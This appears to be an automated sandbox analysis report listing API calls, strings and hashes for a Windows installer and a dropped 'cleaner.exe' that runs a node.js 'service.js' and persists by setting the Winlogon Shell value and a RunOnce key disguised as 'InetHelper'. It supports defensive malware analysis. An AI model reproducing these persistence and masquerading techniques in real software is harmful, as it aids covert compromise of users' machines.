                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,0002E789), ref: 00402E87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                                                                                              • Opcode ID: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction ID: e56410310a72084f4d909e549713b6ef5e7faa8c618e51606751afd800fe69ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0317064020CABDF206F60DD4EBEE3B69EB40319F00803AFA45B51D0DBF999598F99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                                              • Opcode ID: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction ID: cde632e975db2237da1c3b35629bcc1af8e7f74e244a4afe6fc019873d9bc44b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921BFB1C00124BBCF116FA5DE48D9E7E79EF09324F10023AF9647A2E1CB794D418B98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$(gD
                                                                                                                                                                                                              • API String ID: 3540041739-492854681
                                                                                                                                                                                                              • Opcode ID: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction ID: aaf23b967d3fcc40b536a7be4f54997d0d4b2484921d6e850771612597014f60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11EB73A0412837EB00556DAC45EDF3288EB85374F264237FA66F31D1E979CC5282E8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D8), ref: 00401E3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                                                                              • Opcode ID: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction ID: f94ea66f3bb0d18877d48f50851b2a4d43bd5926543aaa07d49364debbc8af75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A601B575A04240BFF7009BF5AE0A7D9BFB5AB55309F10847DF642B61E2D97840858F2D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              • Opcode ID: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction ID: c4075bb9bfde8645d9c714665ee228779135434f852c8317c1fe236da41c92b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              • Opcode ID: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction ID: 177e50295cc88f553b9a3067857c13a37c9039e473aa79b37457755941741264
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97219371948209AEEF05DFB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889809B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,0043E708,00000000,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe","C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe","C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,0043E708), ref: 00406307
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004062BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 3356406503-1638566638
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Callgraph

• Function_00ED107D -> Function_00ED1000

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ED1097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 00ED10B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00ED10BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00ED10C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00ED10FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED1113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00ED112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00ED1153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00ED1168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00ED1188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00ED119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 00ED11A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00ED11AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00ED11B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00ED11C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 00ED11F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED11FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ED120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00ED1259
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00ED1295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00ED12AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00ED12B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00ED12BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00ED12C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00ED12CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00ED12CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ED12D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 00ED12E3
                                                                                                                                                                                                                • Part of subcall function 00ED1000: wcslen.MSVCRT ref: 00ED101C
                                                                                                                                                                                                                • Part of subcall function 00ED1000: calloc.MSVCRT ref: 00ED1030
                                                                                                                                                                                                                • Part of subcall function 00ED1000: wcslen.MSVCRT ref: 00ED104B
                                                                                                                                                                                                                • Part of subcall function 00ED1000: memcpy.MSVCRT ref: 00ED1061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED12E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00ED1327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 00ED134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED1351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED1358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED1364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00ED136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00ED13A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00ED13AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 00ED13CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00ED13D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00ED13DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00ED1417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00ED141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00ED1437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00ED143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2140729083.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 0000000E.00000002.2140714156.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000E.00000002.2140744009.0000000000ED2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_ed0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: <!$<!$InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-4068444580
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2140729083.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 0000000E.00000002.2140714156.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000E.00000002.2140744009.0000000000ED2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_ed0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(004366E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
